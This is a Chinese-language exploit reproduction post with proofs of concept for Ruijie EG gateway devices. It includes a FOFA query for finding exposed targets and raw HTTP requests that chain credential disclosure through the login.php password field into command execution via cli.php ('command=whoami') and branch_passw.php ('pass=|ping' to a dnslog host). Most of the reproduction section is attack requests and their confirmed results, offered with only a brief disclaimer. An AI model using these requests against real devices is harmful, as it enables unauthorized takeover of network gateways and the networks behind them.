锐捷EG易网关login.php以及其后台cli.php/branch_passw.php RCE漏洞复现 [附POC]

锐捷EG易网关login.php以及其后台cli.php/branch_passw.php远程代码执行漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷EG易网关系统存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。

0x03 影响版本

锐捷EG易网关系统

0x04 漏洞环境

FOFA语法：app=“Ruijie-EG易网关”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （POST）

锐捷EG易网关login.php

POST /login.php HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

username=admin&password=admin?show+webmaster+user

3.复现

1.执行查看用户名和密码数据包，show webmaster users得到回显，那么我就可以使用该账户密码，进后台执行命令获取权限

2.cli.php执行whoami命令，得到回显
用得到的用户名和密码登录后台，抓取如下数据包并执行whoami命令。
POC （POST）
锐捷EG易网关cli.php

POST /cli.php?a=shell HTTP/1.1
Host: ip:port
Content-Length: 28
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=8059c39777g22pg6jegahh06g5; user=admin; helpKey=home_sys
Connection: close

notdelay=true&command=whoami

有回显，whoami命令成功执行！！！

3.用得到的用户名和密码登录后台，抓取如下数据包并（branch_passw.php）执行ping命令（因此命令执行无回显，需写入test.txt文件到web根目录，再访问test.txt文件得到回显）

POC （POST）
锐捷EG易网关branch_passw.php

POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host: ip:port
Accept: */*
Accept-Encoding: gzip, deflate
Referer: http://ip:port/cache.htm
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Origin: http://ip:port
Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=ddfih2adhrphl4nt19gk5ujbb6; user=admin; helpKey=home_sys
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Length: 0

pass=|ping zokgupmuqg.dgrh3.cn

dnslog有回显，ping命令成功执行！！！